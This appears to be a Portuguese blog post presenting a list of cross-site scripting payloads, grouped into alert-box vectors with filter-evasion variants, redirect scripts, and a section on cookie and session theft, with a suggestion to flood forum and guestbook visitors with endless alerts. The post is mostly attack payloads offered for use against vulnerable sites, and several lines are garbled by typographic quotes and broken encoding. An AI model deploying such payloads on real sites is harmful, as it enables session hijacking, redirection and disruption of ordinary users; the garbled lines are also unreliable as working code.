XSS – Guia de Filtros e exemplos de Ataques

Nesta seção, vamos olhar para uma série de filtros e exemplos de XSS (Cross Site Scripting) ataques destinados a sites e penetração com vulnerabilidades XSS, espero que possa ajudar e dar ideias. Mensagem de alerta XSS Com esse código, uma mensagem de aviso será gerada em toda a página vulnerável, a mensagem é modificada:

  1. <script>alert(“XSS”);</script>  
  1. <IMG SRC=“javascript:alert(‘XSS’);”>
  1. <IMG SRC=javascript:alert(‘XSS’)>  
  1. <IMG SRC=JaVaScRiPt:alert(‘XSS’)> 
  1. <IMG SRC=javascript:alert(“XSS”)>  
  1. <IMG SRC=`javascript:alert(“RM’XSS'”)`>
  1. <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>>  
  1. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>  
  1. <IMG SRC=“jav    ascript:alert(‘XSS’);”>  
  1. <IMG SRC=“jav    ascript:alert(‘XSS’);”>  
  1. <IMG SRC=”javascript:alert(‘XSS’);”>
  1. <IMG SRC=”javascript:alert(‘XSS’);”>
  1. <IMG SRC=”   javascript:alert(‘XSS’);”> 
  1. <IMG SRC=“javascript:alert(‘XSS’)”>  
  1. <IMG DYNSRC=“javascript:alert(‘XSS’)”>  
  1. <IMG LOWSRC=“javascript:alert(‘XSS’)”> 
  1. <IMG SRC=‘vbscript:msgbox(“XSS”)’>  
  1. <DIV STYLE=“background-image: url(javascript:alert(‘XSS’))”>  
  1. <DIV STYLE=“background-image:07507206C028’06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029’029”>  
  1. <DIV STYLE=“background-image: url(javascript:alert(‘XSS’))”>  
  1. <DIV STYLE=“width: expression(alert(‘XSS’));”>  
  1. <BODY BACKGROUND=“javascript:alert(‘XSS’)”>  
  1. <BODY ONLOAD=alert(‘XSS’)>  
  1. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>  
  1. <TABLE BACKGROUND=“javascript:alert(‘XSS’)”>  
  1. <TABLE><TD BACKGROUND=“javascript:alert(‘XSS’)”>  

Uma maneira simples de tocar o nariz para os usuários é de alertas de pontuação intermináveis. Isso vai forçá-los a matar o processo do navegador, por ter muitas abas. Se isso acontece no meio de uma transação ou outro momento importante de navegação pode ser desastroso para o usuário, este método é mais eficaz no livro de visitas ou fóruns vulnerável:

Redirecionamento XSS Para realizar um redirecionamento e fazer um site inacessível, podemos tentar usar document.location, window.location, location.replace location.assign e todos geram o mesmo resultado de redirecionamento:

  1. <script>document.location.href = https://mundotecnologico.net/&#8221;;</script>  
  1. <script>window.location = https://mundotecnologico.net/&#8221;;</script>  
  1. <script>location.assign(“”http://mundotecnologico.net/””);</script>  
  1. <script>location.replace(“http://mundotecnologico.net/”);</script>  

Robo de Cookie e Sessão A través da propiedad document.cookie podemos sacar o cookie que está utilizando o usuario:

  1. <script language=“javascript”>alert(“XSS Cookie: ” + document.cookie);</script  
  1. <IMG SRC=“javascript:document.cookie=true;”>  
  1. <IMG DYNSRC=“javascript:document.cookie=true;”>  
  1. <IMG LOWSRC=“javascript:document.cookie=true;”>  
  1. <IMG STYLE=“CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)”>  
  1. <iframe src=”javascript:document.cookie=true;>  
  1. <INPUT TYPE=“IMAGE” SRC=“javascript:document.cookie=true;”>  
  1. <BODY BACKGROUND=“javascript:document.cookie=true;”>  
  1. <BODY ONLOAD=document.cookie=true;>  
  1. <BGSOUND SRC=“javascript:document.cookie=true;”>  
  1. <BR SIZE=“&{document.cookie=true}”>  
  1. <LINK REL=“stylesheet” HREF=“javascript:document.cookie=true;”>  
  1. <TABLE BACKGROUND=“javascript:document.cookie=true;”>  
  1. <DIV STYLE=“background-image: url(javascript:document.cookie=true;)”>  
  1. <DIV STYLE=“background-image: url(javascript:document.cookie=true;)”>  
  1. <DIV STYLE=“width: expression(document.cookie=true);”>  
  1. <STYLE TYPE=“text/javascript”>document.cookie=true;</STYLE>  
  1. <STYLE>.CrossSiteScripting{background-image:url(“javascript:document.cookie=true“);}</STYLE><A CLASS=CrossSiteScripting></A>  
  1. <STYLE type=“text/css”>BODY{background:url(“javascript:document.cookie=true“)}</STYLE>  
  1. <iframe src=”javascript:document.cookie=true;>  
  1. <div onmouseover=“document.cookie=true;”>  
  1. <div style=“background-image: url(javascript:document.cookie=true;);”>  
  1. <div style=“width: expression(document.cookie=true;);”>  
  1. <body onload=“document.cookie=true;”>  
  1. <iframe src=”javascript:document.cookie=true;>  

Caso queira um documento com muitos outros comandos, veja abaixo:

XSS_Extra

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair /  Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair /  Alterar )

Conectando a %s